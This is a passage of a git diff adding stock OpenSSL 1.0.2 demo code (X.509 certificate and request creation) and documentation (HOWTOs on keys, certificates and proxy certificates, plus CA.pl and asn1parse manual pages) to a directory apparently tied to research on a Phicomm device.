+        if ((pk = EVP_PKEY_new()) == NULL) {
+            abort();
+            return (0);
+        }
+    } else
+        pk = *pkeyp;
+
+    if ((x509p == NULL) || (*x509p == NULL)) {
+        if ((x = X509_new()) == NULL)
+            goto err;
+    } else
+        x = *x509p;
+
+    rsa = RSA_generate_key(bits, RSA_F4, callback, NULL);
+    if (!EVP_PKEY_assign_RSA(pk, rsa)) {
+        abort();
+        goto err;
+    }
+    rsa = NULL;
+
+    X509_set_version(x, 2);
+    ASN1_INTEGER_set(X509_get_serialNumber(x), serial);
+    X509_gmtime_adj(X509_get_notBefore(x), 0);
+    X509_gmtime_adj(X509_get_notAfter(x), (long)60 * 60 * 24 * days);
+    X509_set_pubkey(x, pk);
+
+    name = X509_get_subject_name(x);
+
+    /*
+     * This function creates and adds the entry, working out the correct
+     * string type and performing checks on its length. Normally we'd check
+     * the return value for errors...
+     */
+    X509_NAME_add_entry_by_txt(name, "C", MBSTRING_ASC, "UK", -1, -1, 0);
+    X509_NAME_add_entry_by_txt(name, "CN",
+                               MBSTRING_ASC, "OpenSSL Group", -1, -1, 0);
+
+    /*
+     * Its self signed so set the issuer name to be the same as the subject.
+     */
+    X509_set_issuer_name(x, name);
+
+    /* Add various extensions: standard extensions */
+    add_ext(x, NID_basic_constraints, "critical,CA:TRUE");
+    add_ext(x, NID_key_usage, "critical,keyCertSign,cRLSign");
+
+    add_ext(x, NID_subject_key_identifier, "hash");
+
+    /* Some Netscape specific extensions */
+    add_ext(x, NID_netscape_cert_type, "sslCA");
+
+    add_ext(x, NID_netscape_comment, "example comment extension");
+
+#ifdef CUSTOM_EXT
+    /* Maybe even add our own extension based on existing */
+    {
+        int nid;
+        nid = OBJ_create("1.2.3.4", "MyAlias", "My Test Alias Extension");
+        X509V3_EXT_add_alias(nid, NID_netscape_comment);
+        add_ext(x, nid, "example comment alias");
+    }
+#endif
+
+    if (!X509_sign(x, pk, EVP_sha1()))
+        goto err;
+
+    *x509p = x;
+    *pkeyp = pk;
+    return (1);
+ err:
+    return (0);
+}
+
+/*
+ * Add extension using V3 code: we can set the config file as NULL because we
+ * wont reference any other sections.
+ */
+
+int add_ext(X509 *cert, int nid, char *value)
+{
+    X509_EXTENSION *ex;
+    X509V3_CTX ctx;
+    /* This sets the 'context' of the extensions. */
+    /* No configuration database */
+    X509V3_set_ctx_nodb(&ctx);
+    /*
+     * Issuer and subject certs: both the target since it is self signed, no
+     * request and no CRL
+     */
+    X509V3_set_ctx(&ctx, cert, cert, NULL, NULL, 0);
+    ex = X509V3_EXT_conf_nid(NULL, &ctx, nid, value);
+    if (!ex)
+        return 0;
+
+    X509_add_ext(cert, ex, -1);
+    X509_EXTENSION_free(ex);
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/x509/mkreq.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/x509/mkreq.c
new file mode 100644
index 0000000..4d2ad79
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/x509/mkreq.c
@@ -0,0 +1,168 @@
+/*
+ * Certificate request creation. Demonstrates some request related
+ * operations.
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+
+#include <openssl/pem.h>
+#include <openssl/conf.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+
+int mkreq(X509_REQ **x509p, EVP_PKEY **pkeyp, int bits, int serial, int days);
+int add_ext(STACK_OF(X509_EXTENSION) *sk, int nid, char *value);
+
+int main(int argc, char **argv)
+{
+    BIO *bio_err;
+    X509_REQ *req = NULL;
+    EVP_PKEY *pkey = NULL;
+
+    CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_ON);
+
+    bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+
+    mkreq(&req, &pkey, 512, 0, 365);
+
+    RSA_print_fp(stdout, pkey->pkey.rsa, 0);
+    X509_REQ_print_fp(stdout, req);
+
+    PEM_write_X509_REQ(stdout, req);
+
+    X509_REQ_free(req);
+    EVP_PKEY_free(pkey);
+
+#ifndef OPENSSL_NO_ENGINE
+    ENGINE_cleanup();
+#endif
+    CRYPTO_cleanup_all_ex_data();
+
+    CRYPTO_mem_leaks(bio_err);
+    BIO_free(bio_err);
+    return (0);
+}
+
+static void callback(int p, int n, void *arg)
+{
+    char c = 'B';
+
+    if (p == 0)
+        c = '.';
+    if (p == 1)
+        c = '+';
+    if (p == 2)
+        c = '*';
+    if (p == 3)
+        c = '\n';
+    fputc(c, stderr);
+}
+
+int mkreq(X509_REQ **req, EVP_PKEY **pkeyp, int bits, int serial, int days)
+{
+    X509_REQ *x;
+    EVP_PKEY *pk;
+    RSA *rsa;
+    X509_NAME *name = NULL;
+    STACK_OF(X509_EXTENSION) *exts = NULL;
+
+    if ((pk = EVP_PKEY_new()) == NULL)
+        goto err;
+
+    if ((x = X509_REQ_new()) == NULL)
+        goto err;
+
+    rsa = RSA_generate_key(bits, RSA_F4, callback, NULL);
+    if (!EVP_PKEY_assign_RSA(pk, rsa))
+        goto err;
+
+    rsa = NULL;
+
+    X509_REQ_set_pubkey(x, pk);
+
+    name = X509_REQ_get_subject_name(x);
+
+    /*
+     * This function creates and adds the entry, working out the correct
+     * string type and performing checks on its length. Normally we'd check
+     * the return value for errors...
+     */
+    X509_NAME_add_entry_by_txt(name, "C", MBSTRING_ASC, "UK", -1, -1, 0);
+    X509_NAME_add_entry_by_txt(name, "CN",
+                               MBSTRING_ASC, "OpenSSL Group", -1, -1, 0);
+
+#ifdef REQUEST_EXTENSIONS
+    /*
+     * Certificate requests can contain extensions, which can be used to
+     * indicate the extensions the requestor would like added to their
+     * certificate. CAs might ignore them however or even choke if they are
+     * present.
+     */
+
+    /*
+     * For request extensions they are all packed in a single attribute. We
+     * save them in a STACK and add them all at once later...
+     */
+
+    exts = sk_X509_EXTENSION_new_null();
+    /* Standard extenions */
+
+    add_ext(exts, NID_key_usage, "critical,digitalSignature,keyEncipherment");
+
+    /*
+     * This is a typical use for request extensions: requesting a value for
+     * subject alternative name.
+     */
+
+    add_ext(exts, NID_subject_alt_name, "email:steve@openssl.org");
+
+    /* Some Netscape specific extensions */
+    add_ext(exts, NID_netscape_cert_type, "client,email");
+
+# ifdef CUSTOM_EXT
+    /* Maybe even add our own extension based on existing */
+    {
+        int nid;
+        nid = OBJ_create("1.2.3.4", "MyAlias", "My Test Alias Extension");
+        X509V3_EXT_add_alias(nid, NID_netscape_comment);
+        add_ext(x, nid, "example comment alias");
+    }
+# endif
+
+    /* Now we've created the extensions we add them to the request */
+
+    X509_REQ_add_extensions(x, exts);
+
+    sk_X509_EXTENSION_pop_free(exts, X509_EXTENSION_free);
+
+#endif
+
+    if (!X509_REQ_sign(x, pk, EVP_sha1()))
+        goto err;
+
+    *req = x;
+    *pkeyp = pk;
+    return (1);
+ err:
+    return (0);
+}
+
+/*
+ * Add extension using V3 code: we can set the config file as NULL because we
+ * wont reference any other sections.
+ */
+
+int add_ext(STACK_OF(X509_EXTENSION) *sk, int nid, char *value)
+{
+    X509_EXTENSION *ex;
+    ex = X509V3_EXT_conf_nid(NULL, NULL, nid, value);
+    if (!ex)
+        return 0;
+    sk_X509_EXTENSION_push(sk, ex);
+
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/HOWTO/certificates.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/HOWTO/certificates.txt
new file mode 100644
index 0000000..65f8fc8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/HOWTO/certificates.txt
@@ -0,0 +1,110 @@
+<DRAFT!>
+			HOWTO certificates
+
+1. Introduction
+
+How you handle certificates depends a great deal on what your role is.
+Your role can be one or several of:
+
+  - User of some client application
+  - User of some server application
+  - Certificate authority
+
+This file is for users who wish to get a certificate of their own.
+Certificate authorities should read https://www.openssl.org/docs/apps/ca.html.
+
+In all the cases shown below, the standard configuration file, as
+compiled into openssl, will be used.  You may find it in /etc/,
+/usr/local/ssl/ or somewhere else.  By default the file is named
+openssl.cnf and is described at https://www.openssl.org/docs/apps/config.html.
+You can specify a different configuration file using the
+'-config {file}' argument with the commands shown below.
+
+
+2. Relationship with keys
+
+Certificates are related to public key cryptography by containing a
+public key.  To be useful, there must be a corresponding private key
+somewhere.  With OpenSSL, public keys are easily derived from private
+keys, so before you create a certificate or a certificate request, you
+need to create a private key.
+
+Private keys are generated with 'openssl genrsa -out privkey.pem' if
+you want a RSA private key, or if you want a DSA private key:
+'openssl dsaparam -out dsaparam.pem 2048; openssl gendsa -out privkey.pem dsaparam.pem'.
+
+The private keys created by these commands are not passphrase protected;
+it might or might not be the desirable thing.  Further information on how to
+create private keys can be found at https://www.openssl.org/docs/HOWTO/keys.txt.
+The rest of this text assumes you have a private key in the file privkey.pem.
+
+
+3. Creating a certificate request
+
+To create a certificate, you need to start with a certificate request
+(or, as some certificate authorities like to put it, "certificate
+signing request", since that's exactly what they do, they sign it and
+give you the result back, thus making it authentic according to their
+policies).  A certificate request is sent to a certificate authority
+to get it signed into a certificate. You can also sign the certificate
+yourself if you have your own certificate authority or create a
+self-signed certificate (typically for testing purpose).
+
+The certificate request is created like this:
+
+  openssl req -new -key privkey.pem -out cert.csr
+
+Now, cert.csr can be sent to the certificate authority, if they can
+handle files in PEM format.  If not, use the extra argument '-outform'
+followed by the keyword for the format to use (see another HOWTO
+<formats.txt?>).  In some cases, -outform does not let you output the
+certificate request in the right format and you will have to use one
+of the various other commands that are exposed by openssl (or get
+creative and use a combination of tools).
+
+The certificate authority performs various checks (according to their
+policies) and usually waits for payment from you. Once that is
+complete, they send you your new certificate.
+
+Section 5 will tell you more on how to handle the certificate you
+received.
+
+
+4. Creating a self-signed test certificate
+
+You can create a self-signed certificate if you don't want to deal
+with a certificate authority, or if you just want to create a test
+certificate for yourself.  This is similar to creating a certificate
+request, but creates a certificate instead of a certificate request.
+This is NOT the recommended way to create a CA certificate, see
+https://www.openssl.org/docs/apps/ca.html.
+
+  openssl req -new -x509 -key privkey.pem -out cacert.pem -days 1095
+
+
+5. What to do with the certificate
+
+If you created everything yourself, or if the certificate authority
+was kind enough, your certificate is a raw DER thing in PEM format.
+Your key most definitely is if you have followed the examples above.
+However, some (most?) certificate authorities will encode them with
+things like PKCS7 or PKCS12, or something else.  Depending on your
+applications, this may be perfectly OK, it all depends on what they
+know how to decode.  If not, There are a number of OpenSSL tools to
+convert between some (most?) formats.
+
+So, depending on your application, you may have to convert your
+certificate and your key to various formats, most often also putting
+them together into one file.  The ways to do this is described in
+another HOWTO <formats.txt?>, I will just mention the simplest case.
+In the case of a raw DER thing in PEM format, and assuming that's all
+right for your applications, simply concatenating the certificate and
+the key into a new file and using that one should be enough.  With
+some applications, you don't even have to do that.
+
+
+By now, you have your certificate and your private key and can start
+using applications that depend on it.
+
+-- 
+Richard Levitte
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/HOWTO/keys.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/HOWTO/keys.txt
new file mode 100644
index 0000000..7ae2a3a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/HOWTO/keys.txt
@@ -0,0 +1,73 @@
+<DRAFT!>
+			HOWTO keys
+
+1. Introduction
+
+Keys are the basis of public key algorithms and PKI.  Keys usually
+come in pairs, with one half being the public key and the other half
+being the private key.  With OpenSSL, the private key contains the
+public key information as well, so a public key doesn't need to be
+generated separately.
+
+Public keys come in several flavors, using different cryptographic
+algorithms.  The most popular ones associated with certificates are
+RSA and DSA, and this HOWTO will show how to generate each of them.
+
+
+2. To generate a RSA key
+
+A RSA key can be used both for encryption and for signing.
+
+Generating a key for the RSA algorithm is quite easy, all you have to
+do is the following:
+
+  openssl genrsa -des3 -out privkey.pem 2048
+
+With this variant, you will be prompted for a protecting password.  If
+you don't want your key to be protected by a password, remove the flag
+'-des3' from the command line above.
+
+    NOTE: if you intend to use the key together with a server
+    certificate, it may be a good thing to avoid protecting it
+    with a password, since that would mean someone would have to
+    type in the password every time the server needs to access
+    the key.
+
+The number 2048 is the size of the key, in bits.  Today, 2048 or
+higher is recommended for RSA keys, as fewer amount of bits is
+consider insecure or to be insecure pretty soon.
+
+
+3. To generate a DSA key
+
+A DSA key can be used for signing only.  This is important to keep
+in mind to know what kind of purposes a certificate request with a
+DSA key can really be used for.
+
+Generating a key for the DSA algorithm is a two-step process.  First,
+you have to generate parameters from which to generate the key:
+
+  openssl dsaparam -out dsaparam.pem 2048
+
+The number 2048 is the size of the key, in bits.  Today, 2048 or
+higher is recommended for DSA keys, as fewer amount of bits is
+consider insecure or to be insecure pretty soon.
+
+When that is done, you can generate a key using the parameters in
+question (actually, several keys can be generated from the same
+parameters):
+
+  openssl gendsa -des3 -out privkey.pem dsaparam.pem
+
+With this variant, you will be prompted for a protecting password.  If
+you don't want your key to be protected by a password, remove the flag
+'-des3' from the command line above.
+
+    NOTE: if you intend to use the key together with a server
+    certificate, it may be a good thing to avoid protecting it
+    with a password, since that would mean someone would have to
+    type in the password every time the server needs to access
+    the key.
+
+-- 
+Richard Levitte
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/HOWTO/proxy_certificates.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/HOWTO/proxy_certificates.txt
new file mode 100644
index 0000000..d78be2f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/HOWTO/proxy_certificates.txt
@@ -0,0 +1,306 @@
+			HOWTO proxy certificates
+
+0. WARNING
+
+NONE OF THE CODE PRESENTED HERE HAS BEEN CHECKED!  The code is just examples to
+show you how things could be done.  There might be typos or type conflicts, and
+you will have to resolve them.
+
+1. Introduction
+
+Proxy certificates are defined in RFC 3820.  They are really usual certificates
+with the mandatory extension proxyCertInfo.
+
+Proxy certificates are issued by an End Entity (typically a user), either
+directly with the EE certificate as issuing certificate, or by extension through
+an already issued proxy certificate.  Proxy certificates are used to extend
+rights to some other entity (a computer process, typically, or sometimes to the
+user itself).  This allows the entity to perform operations on behalf of the
+owner of the EE certificate.
+
+See http://www.ietf.org/rfc/rfc3820.txt for more information.
+
+
+2. A warning about proxy certificates
+
+No one seems to have tested proxy certificates with security in mind.  To this
+date, it seems that proxy certificates have only been used in a context highly
+aware of them.
+
+Existing applications might misbehave when trying to validate a chain of
+certificates which use a proxy certificate.  They might incorrectly consider the
+leaf to be the certificate to check for authorisation data, which is controlled
+by the EE certificate owner.
+
+subjectAltName and issuerAltName are forbidden in proxy certificates, and this
+is enforced in OpenSSL.  The subject must be the same as the issuer, with one
+commonName added on.
+
+Possible threats we can think of at this time include:
+
+ - impersonation through commonName (think server certificates).
+ - use of additional extensions, possibly non-standard ones used in certain
+   environments, that would grant extra or different authorisation rights.
+
+For these reasons, OpenSSL requires that the use of proxy certificates be
+explicitly allowed.  Currently, this can be done using the following methods:
+
+ - if the application directly calls X509_verify_cert(), it can first call:
+
+   X509_STORE_CTX_set_flags(ctx, X509_V_FLAG_ALLOW_PROXY_CERTS);
+
+   Where ctx is the pointer which then gets passed to X509_verify_cert().
+
+ - proxy certificate validation can be enabled before starting the application
+   by setting the environment variable OPENSSL_ALLOW_PROXY_CERTS.
+
+In the future, it might be possible to enable proxy certificates by editing
+openssl.cnf.
+
+
+3. How to create proxy certificates
+
+Creating proxy certificates is quite easy, by taking advantage of a lack of
+checks in the 'openssl x509' application (*ahem*).  You must first create a
+configuration section that contains a definition of the proxyCertInfo extension,
+for example:
+
+  [ v3_proxy ]
+  # A proxy certificate MUST NEVER be a CA certificate.
+  basicConstraints=CA:FALSE
+
+  # Usual authority key ID
+  authorityKeyIdentifier=keyid,issuer:always
+
+  # The extension which marks this certificate as a proxy
+  proxyCertInfo=critical,language:id-ppl-anyLanguage,pathlen:1,policy:text:AB
+
+It's also possible to specify the proxy extension in a separate section:
+
+  proxyCertInfo=critical,@proxy_ext
+
+  [ proxy_ext ]
+  language=id-ppl-anyLanguage
+  pathlen=0
+  policy=text:BC
+
+The policy value has a specific syntax, {syntag}:{string}, where the syntag
+determines what will be done with the string.  The following syntags are
+recognised:
+
+  text  indicates that the string is simply bytes, without any encoding:
+
+          policy=text:räksmörgås
+
+        Previous versions of this design had a specific tag for UTF-8 text.
+        However, since the bytes are copied as-is anyway, there is no need for
+        such a specific tag.
+
+  hex   indicates the string is encoded in hex, with colons between each byte
+        (every second hex digit):
+
+          policy=hex:72:E4:6B:73:6D:F6:72:67:E5:73
+
+        Previous versions of this design had a tag to insert a complete DER
+        blob.  However, the only legal use for this would be to surround the
+        bytes that would go with the hex: tag with whatever is needed to
+        construct a correct OCTET STRING.  The DER tag therefore felt
+        superfluous, and was removed.
+
+  file  indicates that the text of the policy should really be taken from a
+        file.  The string is then really a file name.  This is useful for
+        policies that are large (more than a few lines, e.g. XML documents).
+
+The 'policy' setting can be split up in multiple lines like this:
+
+  0.policy=This is
+  1.policy= a multi-
+  2.policy=line policy.
+
+NOTE: the proxy policy value is the part which determines the rights granted to
+the process using the proxy certificate.  The value is completely dependent on
+the application reading and interpreting it!
+
+Now that you have created an extension section for your proxy certificate, you
+can easily create a proxy certificate by doing:
+
+  openssl req -new -config openssl.cnf -out proxy.req -keyout proxy.key
+  openssl x509 -req -CAcreateserial -in proxy.req -days 7 -out proxy.crt \
+    -CA user.crt -CAkey user.key -extfile openssl.cnf -extensions v3_proxy
+
+You can also create a proxy certificate using another proxy certificate as
+issuer (note: I'm using a different configuration section for it):
+
+  openssl req -new -config openssl.cnf -out proxy2.req -keyout proxy2.key
+  openssl x509 -req -CAcreateserial -in proxy2.req -days 7 -out proxy2.crt \
+    -CA proxy.crt -CAkey proxy.key -extfile openssl.cnf -extensions v3_proxy2
+
+
+4. How to have your application interpret the policy?
+
+The basic way to interpret proxy policies is to start with some default rights,
+then compute the resulting rights by checking the proxy certificate against
+the chain of proxy certificates, user certificate and CA certificates. You then
+use the final computed rights.  Sounds easy, huh?  It almost is.
+
+The slightly complicated part is figuring out how to pass data between your
+application and the certificate validation procedure.
+
+You need the following ingredients:
+
+ - a callback function that will be called for every certificate being
+   validated.  The callback be called several times for each certificate,
+   so you must be careful to do the proxy policy interpretation at the right
+   time.  You also need to fill in the defaults when the EE certificate is
+   checked.
+
+ - a data structure that is shared between your application code and the
+   callback.
+
+ - a wrapper function that sets it all up.
+
+ - an ex_data index function that creates an index into the generic ex_data
+   store that is attached to an X509 validation context.
+
+Here is some skeleton code you can fill in:
+
+  /* In this example, I will use a view of granted rights as a bit
+     array, one bit for each possible right.  */
+  typedef struct your_rights {
+    unsigned char rights[total_rights / 8];
+  } YOUR_RIGHTS;
+
+  /* The following procedure will create an index for the ex_data
+     store in the X509 validation context the first time it's called.
+     Subsequent calls will return the same index.  */
+  static int get_proxy_auth_ex_data_idx(void)
+  {
+    static volatile int idx = -1;
+    if (idx < 0)
+      {
+        CRYPTO_w_lock(CRYPTO_LOCK_X509_STORE);
+        if (idx < 0)
+          {
+            idx = X509_STORE_CTX_get_ex_new_index(0,
+                                                  "for verify callback",
+                                                  NULL,NULL,NULL);
+          }
+        CRYPTO_w_unlock(CRYPTO_LOCK_X509_STORE);
+      }
+    return idx;
+  }
+
+  /* Callback to be given to the X509 validation procedure.  */
+  static int verify_callback(int ok, X509_STORE_CTX *ctx)
+  {
+    if (ok == 1) /* It's REALLY important you keep the proxy policy
+                    check within this section.  It's important to know
+                    that when ok is 1, the certificates are checked
+                    from top to bottom.  You get the CA root first,
+                    followed by the possible chain of intermediate
+                    CAs, followed by the EE certificate, followed by
+                    the possible proxy certificates.  */
+      {
+        X509 *xs = ctx->current_cert;
+
+        if (xs->ex_flags & EXFLAG_PROXY)
+          {
+            YOUR_RIGHTS *rights =
+              (YOUR_RIGHTS *)X509_STORE_CTX_get_ex_data(ctx,
+                get_proxy_auth_ex_data_idx());
+            PROXY_CERT_INFO_EXTENSION *pci =
+              X509_get_ext_d2i(xs, NID_proxyCertInfo, NULL, NULL);
+
+            switch (OBJ_obj2nid(pci->proxyPolicy->policyLanguage))
+              {
+              case NID_Independent:
+                /* Do whatever you need to grant explicit rights to
+                   this particular proxy certificate, usually by
+                   pulling them from some database.  If there are none
+                   to be found, clear all rights (making this and any
+                   subsequent proxy certificate void of any rights).
+                */
+                memset(rights->rights, 0, sizeof(rights->rights));
+                break;
+              case NID_id_ppl_inheritAll:
+                /* This is basically a NOP, we simply let the current
+                   rights stand as they are. */
+                break;
+              default:
+                /* This is usually the most complex section of code.
+                   You really do whatever you want as long as you
+                   follow RFC 3820.  In the example we use here, the
+                   simplest thing to do is to build another, temporary
+                   bit array and fill it with the rights granted by
+                   the current proxy certificate, then use it as a
+                   mask on the accumulated rights bit array, and
+                   voilà, you now have a new accumulated rights bit
+                   array.  */
+                {
+                  int i;
+                  YOUR_RIGHTS tmp_rights;
+                  memset(tmp_rights.rights, 0, sizeof(tmp_rights.rights));
+
+                  /* process_rights() is supposed to be a procedure
+                     that takes a string and it's length, interprets
+                     it and sets the bits in the YOUR_RIGHTS pointed
+                     at by the third argument.  */
+                  process_rights((char *) pci->proxyPolicy->policy->data,
+                                 pci->proxyPolicy->policy->length,
+                                 &tmp_rights);
+
+                  for(i = 0; i < total_rights / 8; i++)
+                    rights->rights[i] &= tmp_rights.rights[i];
+                }
+                break;
+              }
+            PROXY_CERT_INFO_EXTENSION_free(pci);
+          }
+        else if (!(xs->ex_flags & EXFLAG_CA))
+          {
+            /* We have a EE certificate, let's use it to set default!
+            */
+            YOUR_RIGHTS *rights =
+              (YOUR_RIGHTS *)X509_STORE_CTX_get_ex_data(ctx,
+                get_proxy_auth_ex_data_idx());
+
+            /* The following procedure finds out what rights the owner
+               of the current certificate has, and sets them in the
+               YOUR_RIGHTS structure pointed at by the second
+               argument.  */
+            set_default_rights(xs, rights);
+          }
+      }
+    return ok;
+  }
+
+  static int my_X509_verify_cert(X509_STORE_CTX *ctx,
+                                 YOUR_RIGHTS *needed_rights)
+  {
+    int i;
+    int (*save_verify_cb)(int ok,X509_STORE_CTX *ctx) = ctx->verify_cb;
+    YOUR_RIGHTS rights;
+
+    X509_STORE_CTX_set_verify_cb(ctx, verify_callback);
+    X509_STORE_CTX_set_ex_data(ctx, get_proxy_auth_ex_data_idx(), &rights);
+    X509_STORE_CTX_set_flags(ctx, X509_V_FLAG_ALLOW_PROXY_CERTS);
+    ok = X509_verify_cert(ctx);
+
+    if (ok == 1)
+      {
+        ok = check_needed_rights(rights, needed_rights);
+      }
+
+    X509_STORE_CTX_set_verify_cb(ctx, save_verify_cb);
+
+    return ok;
+  }
+
+If you use SSL or TLS, you can easily set up a callback to have the
+certificates checked properly, using the code above:
+
+  SSL_CTX_set_cert_verify_callback(s_ctx, my_X509_verify_cert, &needed_rights);
+
+
+-- 
+Richard Levitte
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/README
new file mode 100644
index 0000000..6ecc14d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/README
@@ -0,0 +1,12 @@
+
+ apps/openssl.pod .... Documentation of OpenSSL `openssl' command
+ crypto/crypto.pod ... Documentation of OpenSSL crypto.h+libcrypto.a
+ ssl/ssl.pod ......... Documentation of OpenSSL ssl.h+libssl.a
+ openssl.txt ......... Assembled documentation files for OpenSSL [not final]
+ ssleay.txt .......... Assembled documentation of ancestor SSLeay [obsolete]
+ standards.txt ....... Assembled pointers to standards, RFCs or internet drafts
+                       that are related to OpenSSL.
+
+ An archive of HTML documents for the SSLeay library is available from
+ http://www.columbia.edu/~ariel/ssleay/
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/CA.pl.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/CA.pl.pod
new file mode 100644
index 0000000..d326101
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/CA.pl.pod
@@ -0,0 +1,179 @@
+
+=pod
+
+=head1 NAME
+
+CA.pl - friendlier interface for OpenSSL certificate programs
+
+=head1 SYNOPSIS
+
+B<CA.pl>
+[B<-?>]
+[B<-h>]
+[B<-help>]
+[B<-newcert>]
+[B<-newreq>]
+[B<-newreq-nodes>]
+[B<-newca>]
+[B<-xsign>]
+[B<-sign>]
+[B<-signreq>]
+[B<-signcert>]
+[B<-verify>]
+[B<files>]
+
+=head1 DESCRIPTION
+
+The B<CA.pl> script is a perl script that supplies the relevant command line
+arguments to the B<openssl> command for some common certificate operations.
+It is intended to simplify the process of certificate creation and management
+by the use of some simple options.
+
+=head1 COMMAND OPTIONS
+
+=over 4
+
+=item B<?>, B<-h>, B<-help>
+
+prints a usage message.
+
+=item B<-newcert>
+
+creates a new self signed certificate. The private key is written to the file
+"newkey.pem" and the request written to the file "newreq.pem".
+
+=item B<-newreq>
+
+creates a new certificate request. The private key is written to the file
+"newkey.pem" and the request written to the file "newreq.pem".
+
+=item B<-newreq-nodes>
+
+is like B<-newreq> except that the private key will not be encrypted.
+
+=item B<-newca>
+
+creates a new CA hierarchy for use with the B<ca> program (or the B<-signcert>
+and B<-xsign> options). The user is prompted to enter the filename of the CA
+certificates (which should also contain the private key) or by hitting ENTER
+details of the CA will be prompted for. The relevant files and directories
+are created in a directory called "demoCA" in the current directory.
+
+=item B<-pkcs12>
+
+create a PKCS#12 file containing the user certificate, private key and CA
+certificate. It expects the user certificate and private key to be in the
+file "newcert.pem" and the CA certificate to be in the file demoCA/cacert.pem,
+it creates a file "newcert.p12". This command can thus be called after the
+B<-sign> option. The PKCS#12 file can be imported directly into a browser.
+If there is an additional argument on the command line it will be used as the
+"friendly name" for the certificate (which is typically displayed in the browser
+list box), otherwise the name "My Certificate" is used.
+
+=item B<-sign>, B<-signreq>, B<-xsign>
+
+calls the B<ca> program to sign a certificate request. It expects the request
+to be in the file "newreq.pem". The new certificate is written to the file
+"newcert.pem" except in the case of the B<-xsign> option when it is written
+to standard output.
+
+
+=item B<-signCA>
+
+this option is the same as the B<-signreq> option except it uses the configuration
+file section B<v3_ca> and so makes the signed request a valid CA certificate. This
+is useful when creating intermediate CA from a root CA.
+
+=item B<-signcert>
+
+this option is the same as B<-sign> except it expects a self signed certificate
+to be present in the file "newreq.pem".
+
+=item B<-verify>
+
+verifies certificates against the CA certificate for "demoCA". If no certificates
+are specified on the command line it tries to verify the file "newcert.pem". 
+
+=item B<files>
+
+one or more optional certificate file names for use with the B<-verify> command.
+
+=back
+
+=head1 EXAMPLES
+
+Create a CA hierarchy:
+
+ CA.pl -newca
+
+Complete certificate creation example: create a CA, create a request, sign
+the request and finally create a PKCS#12 file containing it.
+
+ CA.pl -newca
+ CA.pl -newreq
+ CA.pl -signreq
+ CA.pl -pkcs12 "My Test Certificate"
+
+=head1 DSA CERTIFICATES
+
+Although the B<CA.pl> creates RSA CAs and requests it is still possible to
+use it with DSA certificates and requests using the L<req(1)|req(1)> command
+directly. The following example shows the steps that would typically be taken.
+
+Create some DSA parameters:
+
+ openssl dsaparam -out dsap.pem 1024
+
+Create a DSA CA certificate and private key:
+
+ openssl req -x509 -newkey dsa:dsap.pem -keyout cacert.pem -out cacert.pem
+
+Create the CA directories and files:
+
+ CA.pl -newca
+
+enter cacert.pem when prompted for the CA file name.
+
+Create a DSA certificate request and private key (a different set of parameters
+can optionally be created first):
+
+ openssl req -out newreq.pem -newkey dsa:dsap.pem 
+
+Sign the request:
+
+ CA.pl -signreq
+
+=head1 NOTES
+
+Most of the filenames mentioned can be modified by editing the B<CA.pl> script.
+
+If the demoCA directory already exists then the B<-newca> command will not
+overwrite it and will do nothing. This can happen if a previous call using
+the B<-newca> option terminated abnormally. To get the correct behaviour
+delete the demoCA directory if it already exists.
+
+Under some environments it may not be possible to run the B<CA.pl> script
+directly (for example Win32) and the default configuration file location may
+be wrong. In this case the command:
+
+ perl -S CA.pl
+
+can be used and the B<OPENSSL_CONF> environment variable changed to point to 
+the correct path of the configuration file "openssl.cnf".
+
+The script is intended as a simple front end for the B<openssl> program for use
+by a beginner. Its behaviour isn't always what is wanted. For more control over the
+behaviour of the certificate commands call the B<openssl> command directly.
+
+=head1 ENVIRONMENT VARIABLES
+
+The variable B<OPENSSL_CONF> if defined allows an alternative configuration
+file location to be specified, it should contain the full path to the
+configuration file, not just its directory.
+
+=head1 SEE ALSO
+
+L<x509(1)|x509(1)>, L<ca(1)|ca(1)>, L<req(1)|req(1)>, L<pkcs12(1)|pkcs12(1)>,
+L<config(5)|config(5)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/asn1parse.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/asn1parse.pod
new file mode 100644
index 0000000..76a765d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/asn1parse.pod
@@ -0,0 +1,185 @@
+=pod
+
+=head1 NAME
+
+asn1parse - ASN.1 parsing tool
+
+=head1 SYNOPSIS
+
+B<openssl> B<asn1parse>
+[B<-inform PEM|DER>]
+[B<-in filename>]
+[B<-out filename>]
+[B<-noout>]
+[B<-offset number>]
+[B<-length number>]
+[B<-i>]
+[B<-oid filename>]
+[B<-dump>]
+[B<-dlimit num>]
+[B<-strparse offset>]
+[B<-genstr string>]
